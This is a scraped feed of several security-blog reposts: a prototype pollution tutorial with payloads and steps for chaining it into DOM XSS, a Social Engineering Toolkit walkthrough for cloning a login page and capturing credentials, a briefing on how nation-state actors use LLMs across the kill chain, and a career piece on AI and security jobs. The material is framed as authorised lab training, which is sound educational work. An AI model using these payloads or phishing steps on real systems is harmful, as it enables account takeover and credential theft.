&lt;p&gt;Every JavaScript object inherits properties from its prototype. My mental model for teaching this: think of Object.prototype as a shared notepad — if I write on it, everyone in the room can read what I wrote, whether or not I intended them to. &lt;code&gt;Object.prototype&lt;/code&gt; is the root — properties added to it appear on every object. Prototype pollution occurs when an attacker can inject a property into &lt;code&gt;Object.prototype&lt;/code&gt; via a path like &lt;code&gt;__proto__&lt;/code&gt;, &lt;code&gt;constructor.prototype&lt;/code&gt;, or &lt;code&gt;prototype&lt;/code&gt;. Any code that later reads that property from any object will receive the attacker-controlled value — even code that has nothing to do with the original injection point.&lt;/p&gt;

&lt;p&gt;PROTOTYPE POLLUTION — MECHANICSCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  The vulnerable pattern — unsafe merge/deep clone
&lt;/h1&gt;

&lt;p&gt;function merge(target, source) {&lt;br&gt;
  for (let key in source) {&lt;br&gt;
    if (typeof source[key] === ‘object’) {&lt;br&gt;
      merge(target[key], source[key]);  // VULNERABLE: target[key] can be &lt;strong&gt;proto&lt;/strong&gt;&lt;br&gt;
    } else {&lt;br&gt;
      target[key] = source[key];&lt;br&gt;
    }&lt;br&gt;
  }&lt;br&gt;
}&lt;/p&gt;

&lt;h1&gt;
  
  
  Attack payload pollutes Object.prototype
&lt;/h1&gt;

&lt;p&gt;merge({}, JSON.parse(‘{“&lt;strong&gt;proto&lt;/strong&gt;”:{“polluted”:”yes”}}’))&lt;br&gt;
// Now: ({}).polluted === “yes”   ← ALL objects inherit this&lt;/p&gt;

&lt;h1&gt;
  
  
  Three injection vectors
&lt;/h1&gt;

&lt;p&gt;?&lt;strong&gt;proto&lt;/strong&gt;[polluted]=yes           # URL query parameter&lt;br&gt;
{“&lt;strong&gt;proto&lt;/strong&gt;”:{“polluted”:”yes”}}   # JSON body&lt;br&gt;
?constructor[prototype][polluted]=yes  # alternative path&lt;/p&gt;

&lt;h1&gt;
  
  
  Quick confirm in browser console
&lt;/h1&gt;

&lt;p&gt;({}).polluted   // should be undefined before, “yes” after pollution&lt;/p&gt;

&lt;h2&gt;
  
  
  Client-Side PP — DOM XSS Chains
&lt;/h2&gt;

&lt;p&gt;Client-side prototype pollution by itself is a Medium finding in my reports. Chained to a DOM XSS gadget it becomes High or Critical — and I always attempt escalation before submitting. My first step after confirming client-side PP is always the gadget search. Chained to a DOM XSS gadget it becomes High or Critical. The chain: pollute a property that a DOM sink later reads without sanitisation — the sink executes your value as HTML or JavaScript. My first step after confirming client-side PP is always searching for gadgets in the application’s JavaScript files that read from polluted prototype properties into sinks like &lt;code&gt;innerHTML&lt;/code&gt;, &lt;code&gt;document.write&lt;/code&gt;, or &lt;code&gt;eval&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;CLIENT-SIDE PP — DOM XSS CHAINCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  Step 1: Confirm prototype pollution via URL
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://target.com/?__proto__%5Btestprop%5D=confirmed" rel="noopener noreferrer"&gt;https://target.com/?__proto__[testprop]=confirmed&lt;/a&gt;&lt;br&gt;
Open DevTools Console: ({}).testprop  → “confirmed” = polluted&lt;/p&gt;

&lt;h1&gt;
  
  
  Step 2: Search for gadgets in app JS
&lt;/h1&gt;

&lt;p&gt;Look for patterns reading undefined properties into DOM sinks:&lt;br&gt;
innerHTML = options.template  // if template is undefined, reads from &lt;strong&gt;proto&lt;/strong&gt;&lt;br&gt;
eval(config.callback)         // if callback polluted → XSS via eval&lt;br&gt;
document.write(settings.html) // if html polluted → XSS&lt;/p&gt;

&lt;h1&gt;
  
  
  Step 3: Craft XSS payload via pollution
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://target.com/?__proto__%5Btemplate%5D=" rel="noopener noreferrer"&gt;https://target.com/?__proto__[template]=&lt;/a&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/x" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/x" width="800" height="400"&gt;&lt;/a&gt;&lt;br&gt;
If app later does: el.innerHTML = options.template (where options has no template)&lt;br&gt;
→ reads from &lt;strong&gt;proto&lt;/strong&gt;.template → XSS executes&lt;/p&gt;

&lt;h1&gt;
  
  
  Chrome DevTools — check prototype pollution
&lt;/h1&gt;

&lt;p&gt;// In console after visiting the URL:&lt;br&gt;
Object.prototype.template  // returns your injected value if polluted&lt;br&gt;
window.&lt;strong&gt;proto&lt;/strong&gt;           // inspect prototype chain&lt;/p&gt;

&lt;p&gt;🛠️ EXERCISE 1 — BROWSER (20 MIN · NO INSTALL)&lt;br&gt;
Research Disclosed Prototype Pollution Reports on HackerOne&lt;/p&gt;

&lt;p&gt;⏱️ &lt;strong&gt;20 minutes · Browser only&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/day-28-prototype-pollution-bug-bounty/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/day-28-prototype-pollution-bug-bounty/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ugountyourse</category>
      <category>ugountyunting</category>
      <category>ugountyeports</category>
      <category>thicalacking</category>
    </item>
    <item>
      <title>SET Social Engineering Toolkit 2026 — Spear-Phishing, Credential Harvesting &amp; Payloads | Kali Linux Day 26</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Mon, 11 May 2026 14:55:56 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/set-social-engineering-toolkit-2026-spear-phishing-credential-harvesting-payloads-kali-linux-3id1</link>
      <guid>https://forem.com/lucky_lonerusher/set-social-engineering-toolkit-2026-spear-phishing-credential-harvesting-payloads-kali-linux-3id1</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/kali-linux-day-26-set-tutorial/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcirc58bll094t01nswhr.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcirc58bll094t01nswhr.webp" alt="SET Social Engineering Toolkit 2026 — Spear-Phishing, Credential Harvesting &amp;amp; Payloads | Kali Linux Day 26" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;🗡️ KALI LINUX COURSE&lt;/p&gt;

&lt;p&gt;FREE&lt;/p&gt;

&lt;p&gt;Part of the &lt;a href="https://dev.to/kali-linux-course/"&gt;180-Day Kali Linux Mastery Course&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Day 26 of 180 · 14.4% complete&lt;/p&gt;

&lt;p&gt;⚠️ &lt;strong&gt;Authorised Engagements Only.&lt;/strong&gt; SET automates attacks that look convincingly real. Every exercise targets your own lab environment. Phishing real targets without written authorisation is illegal.&lt;/p&gt;

&lt;h4&gt;
  
  
  ✅ Before You Start
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://dev.to/kali-linux-day-25-beef-xss-tutorial/"&gt;Day 25 — BeEF-XSS&lt;/a&gt; — browser hooking via XSS. SET takes the same attack surface into the human layer: instead of hooking a browser through a vulnerability, we deliver the payload through a convincing phishing email or cloned site.&lt;/li&gt;
&lt;li&gt;Kali Linux running · Python3 + SET installed (pre-installed in Kali) · DVWA or your own test webserver for cloning&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Every pentest report I write includes a social engineering finding. Not because clients ask for it — they usually don’t — but because the technical controls they’ve spent hundreds of thousands on are bypassed the moment someone clicks a convincing email. SET (Social Engineering Toolkit) is the tool that demonstrates that gap in an authorised, reproducible way. Today I show you the full SET workflow: credential harvester, spear-phishing email vector, and the payload delivery chain that turns a convincing login page into an exploitation path.&lt;/p&gt;

&lt;h3&gt;
  
  
  🎯 What You’ll Master in Day 26
&lt;/h3&gt;

&lt;p&gt;Launch SET and navigate the Social Engineering Attacks menu&lt;br&gt;
Run the Credential Harvester to clone a login page and capture credentials&lt;br&gt;
Craft and send a spear-phishing email with a payload link&lt;br&gt;
Understand SET’s payload delivery options and when each applies&lt;br&gt;
Write a social engineering finding for a pentest report&lt;/p&gt;

&lt;p&gt;⏱️ 40 min read · 3 exercises · Day 26 of 180 ### 📋 Day 26 — SET Social Engineering Toolkit 1. SET Overview — Architecture and Attack Vectors 2. Credential Harvester — Clone and Capture 3. Spear-Phishing Email Attack Vector 4. Payload Delivery — Executable and HTA Files 5. Reporting Social Engineering Findings SET sits at the intersection of &lt;a href="https://dev.to/ethical-hacking/"&gt;ethical hacking methodology&lt;/a&gt; and web security — it automates the human-layer attacks that OWASP describes theoretically. The &lt;a href="https://dev.to/tools/phishing-url-scanner/"&gt;Phishing URL Scanner&lt;/a&gt; is the blue team tool that defends against exactly what SET creates. Understanding both sides is the approach I take in every engagement. The full tool reference is in the &lt;a href="https://dev.to/tools/kali-linux-commands/"&gt;Kali Linux Commands reference&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  SET Overview — Architecture and Attack Vectors
&lt;/h2&gt;

&lt;p&gt;SET (Social Engineering Toolkit) is a Python-based framework created by TrustedSec. It automates the construction and delivery of social engineering attacks for authorised penetration testing. My most-used attack vectors are the Credential Harvester (clones a legitimate login page and captures submitted credentials) and the Spear-Phishing Email Vector (delivers a payload via crafted email). Both demonstrate the human attack surface to clients who believe technical controls alone are sufficient.&lt;/p&gt;

&lt;p&gt;LAUNCHING SET AND NAVIGATING THE MENUCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  Launch SET (requires root)
&lt;/h1&gt;

&lt;p&gt;sudo setoolkit&lt;/p&gt;

&lt;h1&gt;
  
  
  Main menu:
&lt;/h1&gt;

&lt;p&gt;1) Social-Engineering Attacks      ← primary menu&lt;br&gt;
2) Penetration Testing (Fast-Track)&lt;br&gt;
3) Third Party Modules&lt;/p&gt;

&lt;h1&gt;
  
  
  Social Engineering Attacks sub-menu
&lt;/h1&gt;

&lt;p&gt;1) Spear-Phishing Attack Vectors    ← email payload delivery&lt;br&gt;
2) Website Attack Vectors           ← credential harvester, tabnabbing&lt;br&gt;
3) Infectious Media Generator       ← USB autorun payloads&lt;br&gt;
4) Create a Payload and Listener    ← MSF payload generation&lt;br&gt;
5) Mass Mailer Attack               ← bulk phishing campaign&lt;/p&gt;

&lt;h1&gt;
  
  
  Website Attack Vectors sub-menu (most used)
&lt;/h1&gt;

&lt;p&gt;1) Java Applet Attack Method&lt;br&gt;
2) Metasploit Browser Exploit Method&lt;br&gt;
3) Credential Harvester Attack Method  ← TODAY&lt;br&gt;
4) Tabnabbing Attack Method&lt;br&gt;
5) Web Jacking Attack Method&lt;/p&gt;

&lt;h2&gt;
  
  
  Credential Harvester — Clone and Capture
&lt;/h2&gt;

&lt;p&gt;The Credential Harvester clones a target website’s login page, hosts it on my Kali machine, and captures any credentials submitted through the fake page — forwarding the victim to the real site afterwards so they don’t notice. The clone is pixel-perfect because SET scrapes the real HTML. The victim sees their normal login page, submits credentials, gets redirected to the real site, and never realises their password was captured.&lt;/p&gt;

&lt;p&gt;CREDENTIAL HARVESTER — STEP BY STEPCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  Navigation path in SET
&lt;/h1&gt;

&lt;p&gt;Main Menu → 1 (Social Engineering) → 2 (Website Attacks) → 3 (Credential Harvester)&lt;/p&gt;

&lt;h1&gt;
  
  
  SET asks: Site Cloner or Custom Import?
&lt;/h1&gt;

&lt;p&gt;1) Web Templates  → pre-built templates (Gmail, Facebook, etc.)&lt;br&gt;
2) Site Cloner    → clone ANY URL (most useful in assessments)&lt;br&gt;
3) Custom Import  → supply your own HTML&lt;/p&gt;

&lt;h1&gt;
  
  
  Site Cloner workflow
&lt;/h1&gt;

&lt;p&gt;IP address for the POST back: [YOUR KALI IP]&lt;br&gt;
Enter the URL to clone: &lt;a href="http://localhost/dvwa/login.php" rel="noopener noreferrer"&gt;http://localhost/dvwa/login.php&lt;/a&gt;&lt;/p&gt;

&lt;h1&gt;
  
  
  SET clones the page, starts web server on port 80
&lt;/h1&gt;

&lt;h1&gt;
  
  
  Output: [*] Cloning the website: &lt;a href="http://localhost/dvwa/login.php" rel="noopener noreferrer"&gt;http://localhost/dvwa/login.php&lt;/a&gt;
&lt;/h1&gt;

&lt;h1&gt;
  
  
  [*] This could take a little bit…
&lt;/h1&gt;

&lt;h1&gt;
  
  
  [*] Harvester is ready, start sending mails
&lt;/h1&gt;

&lt;h1&gt;
  
  
  Victim visits: &lt;a href="http://YOUR_KALI_IP/" rel="noopener noreferrer"&gt;http://YOUR_KALI_IP/&lt;/a&gt;
&lt;/h1&gt;

&lt;h1&gt;
  
  
  They see cloned DVWA login, submit credentials
&lt;/h1&gt;

&lt;h1&gt;
  
  
  SET output shows:
&lt;/h1&gt;

&lt;p&gt;[*] WE GOT A HIT! Printing the output:&lt;br&gt;
POSSIBLE USERNAME FIELD FOUND: username=admin&lt;br&gt;
POSSIBLE PASSWORD FIELD FOUND: password=password&lt;/p&gt;

&lt;p&gt;securityelites.com&lt;/p&gt;

&lt;p&gt;SET Credential Harvester — Credential Capture Output&lt;br&gt;
[&lt;em&gt;] Harvester is ready, start sending mails&lt;br&gt;
[&lt;/em&gt;] SET Web Server is listening on port: 80&lt;br&gt;
…victim visits cloned page and submits credentials…&lt;br&gt;
[&lt;em&gt;] WE GOT A HIT! Printing the output:&lt;br&gt;
POSSIBLE USERNAME FIELD FOUND: username=admin&lt;br&gt;
POSSIBLE PASSWORD FIELD FOUND: password=password&lt;br&gt;
[&lt;/em&gt;] WHEN YOU’RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.&lt;br&gt;
Captured credentials saved to: /root/.set/reports/&lt;/p&gt;

&lt;p&gt;📸 SET Credential Harvester output showing captured credentials. The “[*] WE GOT A HIT!” line appears the moment a victim submits the cloned login form. SET captures the raw POST data — username, password, and any other form fields. The victim is simultaneously redirected to the real DVWA login page, so from their perspective the login simply “failed once and then worked.” In a real engagement, this output appears in my terminal while I’m watching the phishing campaign — each credential submission is logged with timestamp and full field values.&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/kali-linux-day-26-set-tutorial/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/kali-linux-day-26-set-tutorial/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>credentialharvester</category>
      <category>toolkitkalilinux</category>
      <category>yberecurityools</category>
      <category>thicalacking</category>
    </item>
    <item>
      <title>Nation-State AI Cyberwarfare 2026 — How Governments Use LLMs to Attack</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Mon, 11 May 2026 13:45:04 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/nation-state-ai-cyberwarfare-2026-how-governments-use-llms-to-attack-1iai</link>
      <guid>https://forem.com/lucky_lonerusher/nation-state-ai-cyberwarfare-2026-how-governments-use-llms-to-attack-1iai</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/nation-state-ai-cyberwarfare-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3pt6gdpp30a0f9f6tsi2.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3pt6gdpp30a0f9f6tsi2.webp" alt="Nation-State AI Cyberwarfare 2026 — How Governments Use LLMs to Attack" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The most significant change in nation-state cyber operations over the past two years isn’t a new exploit technique or a novel malware family. It’s the integration of large language models into every phase of the attack lifecycle — from initial reconnaissance through spear-phishing generation, vulnerability research, lateral movement planning, and disinformation at scale. I track these campaigns because understanding what the most well-resourced threat actors are doing today defines what every organisation will face tomorrow. The AI tools nation-states are deploying operationally right now will be commoditised and available to criminal groups within 18 months. This is the briefing I give before every red team engagement in the public sector.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;How nation-state actors are integrating AI into offensive cyber operations&lt;br&gt;
Documented APT AI capabilities from public intelligence reports&lt;br&gt;
The specific AI tools and LLM use cases at each phase of the kill chain&lt;br&gt;
How AI changes attribution — and what defenders must adapt&lt;br&gt;
The defensive posture shift required against AI-assisted adversaries&lt;/p&gt;

&lt;p&gt;⏱️ 35 min read · 3 exercises ### Nation-State AI Cyberwarfare 2026 – Contents 1. Documented Nation-State AI Use Cases 2. AI Across the Cyber Kill Chain 3. AI and the Attribution Problem 4. AI-Enabled Disinformation Operations 5. Defensive Adaptation — What Changes Nation-state AI operations sit at the intersection of the &lt;a href="https://dev.to/ai-in-hacking/"&gt;AI Security series&lt;/a&gt; and the &lt;a href="https://dev.to/penetration-testing/"&gt;Penetration Testing methodology&lt;/a&gt; — the techniques documented in state actor campaigns are the same techniques red teams simulate. The &lt;a href="https://dev.to/ai-red-teaming-guide-2026/"&gt;AI Red Teaming Guide&lt;/a&gt; covers how to test for the AI-assisted attack patterns described here.&lt;/p&gt;

&lt;h2&gt;
  
  
  Documented Nation-State AI Use Cases
&lt;/h2&gt;

&lt;p&gt;My starting point for every nation-state AI briefing is the public record. Microsoft’s Threat Intelligence reports, OpenAI’s own disclosures of nation-state threat actors removed from their platform, and CISA advisories provide a documented baseline that I don’t need to speculate about. The key actors publicly confirmed to be integrating AI into cyber operations span four major nation-state threat groups.&lt;/p&gt;

&lt;p&gt;DOCUMENTED NATION-STATE AI CAPABILITIES — PUBLIC RECORDCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  Russia — Fancy Bear / APT28 (Forest Blizzard)
&lt;/h1&gt;

&lt;p&gt;Disclosed: Using LLMs for research into satellite communication protocols&lt;br&gt;
Disclosed: Scripting and automation tool development using AI assistance&lt;br&gt;
Disclosed: Research into radar signal processing (critical infrastructure targeting)&lt;br&gt;
Source: Microsoft Threat Intelligence + OpenAI disclosure (Feb 2024)&lt;/p&gt;

&lt;h1&gt;
  
  
  North Korea — Lazarus / Kimsuky (Emerald Sleet)
&lt;/h1&gt;

&lt;p&gt;Disclosed: AI-generated spear-phishing targeting defence and think tank researchers&lt;br&gt;
Disclosed: Social engineering content generation in multiple languages&lt;br&gt;
Disclosed: Research into publicly known vulnerabilities for exploitation planning&lt;br&gt;
Source: OpenAI disruption report (Feb 2024)&lt;/p&gt;

&lt;h1&gt;
  
  
  China — APT40 / Volt Typhoon (Salmon Typhoon)
&lt;/h1&gt;

&lt;p&gt;Disclosed: Using LLMs to research technical topics relevant to operational targets&lt;br&gt;
Disclosed: Translation tasks for intelligence processing&lt;br&gt;
Disclosed: Researching Western intelligence techniques and public reporting&lt;br&gt;
Source: Microsoft + OpenAI joint disclosure (Feb 2024)&lt;/p&gt;

&lt;h1&gt;
  
  
  Iran — APT35 / Charming Kitten (Crimson Sandstorm)
&lt;/h1&gt;

&lt;p&gt;Disclosed: Phishing campaign assistance, social engineering content&lt;br&gt;
Disclosed: Research into open-source tools for red team activity&lt;br&gt;
Disclosed: Code writing assistance for malware development workflows&lt;br&gt;
Source: OpenAI disruption report (Feb 2024)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;My Reading of the Disclosures:&lt;/strong&gt; The February 2024 OpenAI and Microsoft joint report is the most important public document on nation-state AI use to date. What’s striking isn’t what they were doing — most uses were research assistance and content generation, not novel AI exploitation. What’s striking is that these actors were caught using commercial AI APIs that log everything. My assessment: the disclosed activity represents the lowest-sophistication tier of their AI operations. The classified tier will be running private models with no telemetry.&lt;/p&gt;

&lt;h2&gt;
  
  
  AI Across the Cyber Kill Chain
&lt;/h2&gt;

&lt;p&gt;My framework for thinking about nation-state AI integration maps each kill chain phase to the specific AI capability that changes the threat. The pattern is consistent: AI compresses the time and skill requirements at every phase, and it particularly narrows the gap between state-level and criminal-level capability.&lt;/p&gt;

&lt;p&gt;AI IN THE CYBER KILL CHAIN — NATION-STATE APPLICATIONSCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  Phase 1: Reconnaissance
&lt;/h1&gt;

&lt;p&gt;Traditional: analysts manually review LinkedIn, public docs, job postings&lt;br&gt;
AI-enabled: automated OSINT synthesis → target profiles at 10,000x scale&lt;br&gt;
LLM use: “Generate a targeting profile from this LinkedIn data and identify insider risk indicators”&lt;br&gt;
Impact: breadth of targeting now unconstrained by analyst headcount&lt;/p&gt;

&lt;h1&gt;
  
  
  Phase 2: Weaponisation / Spear-Phishing
&lt;/h1&gt;

&lt;p&gt;Traditional: one native-language operator per language target → low scale&lt;br&gt;
AI-enabled: hyper-personalised spear-phish in any language, any register&lt;br&gt;
Documented: North Korean operators using LLMs to write English-language research lures&lt;br&gt;
Impact: language barrier eliminated → every target reachable in native language&lt;/p&gt;

&lt;h1&gt;
  
  
  Phase 3: Delivery / Initial Access
&lt;/h1&gt;

&lt;p&gt;AI use: optimising payload delivery based on target’s email client, AV profile&lt;br&gt;
AI use: generating convincing cover identities for watering hole operations&lt;br&gt;
AI use: vulnerability research for zero-day discovery (see AQ49)&lt;/p&gt;

&lt;h1&gt;
  
  
  Phase 4: Post-Exploitation / Lateral Movement
&lt;/h1&gt;

&lt;p&gt;AI use: LLM-assisted code generation for custom implants → faster development&lt;br&gt;
AI use: real-time “what should I do next” guidance from AI given network context&lt;br&gt;
Research: AI C2 frameworks where the model decides lateral movement targets&lt;br&gt;
Impact: operator skill floor drops significantly → less experienced operators achieve more&lt;/p&gt;

&lt;h1&gt;
  
  
  Phase 5: Exfiltration / Objectives
&lt;/h1&gt;

&lt;p&gt;AI use: automated document triage — “which of these 50,000 files contain nuclear data?”&lt;br&gt;
AI use: translation of exfiltrated foreign-language documents at scale&lt;br&gt;
AI use: pattern detection in structured data (financial, communications) for intelligence value&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/nation-state-ai-cyberwarfare-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/nation-state-ai-cyberwarfare-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aicyberwarfare</category>
      <category>aptaitooling</category>
      <category>governmentaihacking</category>
      <category>llmcyberattacks</category>
    </item>
    <item>
      <title>Will AI Replace Cybersecurity Jobs in 2026? The Honest Answer</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Sun, 10 May 2026 17:11:04 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/will-ai-replace-cybersecurity-jobs-in-2026-the-honest-answer-316i</link>
      <guid>https://forem.com/lucky_lonerusher/will-ai-replace-cybersecurity-jobs-in-2026-the-honest-answer-316i</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/will-ai-replace-cybersecurity-jobs-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fablc6omlhdxwcw68r0c7.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fablc6omlhdxwcw68r0c7.webp" alt="Will AI Replace Cybersecurity Jobs in 2026? The Honest   Answer" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The short answer is no — but the more useful answer is “it depends on what you do.” AI is already changing specific security tasks, making some roles more productive and making others less necessary at current staffing levels. My experience working with security teams: organisations are hiring security professionals who understand AI, not replacing teams with AI. Here is the honest breakdown of what is changing, what is not, and exactly what to do if you are building or protecting a cybersecurity career in 2026.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;Which security tasks AI is genuinely automating in 2026&lt;br&gt;
Which roles are growing because of AI, not shrinking&lt;br&gt;
The specific skills that make security professionals AI-resistant&lt;br&gt;
Salary data for the new AI security roles&lt;br&gt;
Your career plan for the next 3–5 years&lt;/p&gt;

&lt;p&gt;⏱️ 12 min read ### Will AI Replace Cybersecurity Jobs in 2026 — Honest Answer 1. What AI Is Actually Automating 2. Roles That Are Growing Because of AI 3. Tasks Most At Risk of Automation 4. Skills That Matter Most Going Forward 5. Career Planning for the AI Era The AI tools changing security work are covered in the &lt;a href="https://dev.to/how-to-use-ai-for-cybersecurity-2026/"&gt;AI for Cybersecurity guide&lt;/a&gt;. The technical AI security skills in demand are in the &lt;a href="https://dev.to/ai-red-teaming-guide-2026/"&gt;AI Red Teaming Guide&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  What AI Is Actually Automating
&lt;/h2&gt;

&lt;p&gt;My direct observation from working with security teams in 2025 and 2026: AI has measurably reduced the manual effort in specific, well-defined tasks. The pattern is consistent — AI handles the volume processing while humans handle the judgment calls. The roles that have seen the most change are tier-1 SOC analysts and vulnerability triage specialists.&lt;/p&gt;

&lt;p&gt;TASKS AI IS CHANGING — 2026 REALITY CHECKCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  Tasks with high automation in production today
&lt;/h1&gt;

&lt;p&gt;Tier-1 alert triage:        AI pre-scores and filters → analyst handles escalated alerts&lt;br&gt;
Log correlation:            AI surfaces anomalies from millions of events&lt;br&gt;
Vulnerability prioritisation: AI-scored vuln lists replace manual CVSS triage&lt;br&gt;
Phishing classification:    AI classifies at inbox scale, no human per email&lt;br&gt;
Threat intel digestion:     AI summarises feeds and CVE descriptions automatically&lt;/p&gt;

&lt;h1&gt;
  
  
  What this means for headcount (honest)
&lt;/h1&gt;

&lt;p&gt;Teams are NOT shrinking — they’re handling 2–3x the alert volume with the same headcount&lt;br&gt;
Tier-1 hiring is slowing: fewer entry-level triage roles being backfilled when vacated&lt;br&gt;
Senior hiring is growing: experienced analysts who can work with AI tools in high demand&lt;/p&gt;

&lt;h2&gt;
  
  
  Roles That Are Growing Because of AI
&lt;/h2&gt;

&lt;p&gt;The roles I see in active demand in hiring: AI security is a category that barely existed three years ago. Organisations deploying AI tools need people who can assess, govern, and test those systems. This is entirely new demand, not redeployment.&lt;/p&gt;

&lt;p&gt;GROWING SECURITY ROLES — AI ERA DEMANDCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  New roles created by AI
&lt;/h1&gt;

&lt;p&gt;AI Security Engineer:    secure and monitor AI systems in production ($130K–$200K+)&lt;br&gt;
AI Red Teamer:           test AI for prompt injection, jailbreaking, data leakage ($140K–$220K)&lt;br&gt;
AI Governance Analyst:   policy, compliance, and risk management for AI ($100K–$150K)&lt;br&gt;
AI Threat Intelligence:  track AI-powered attack campaigns and threat actor tooling ($110K–$160K)&lt;/p&gt;

&lt;h1&gt;
  
  
  Existing roles amplified
&lt;/h1&gt;

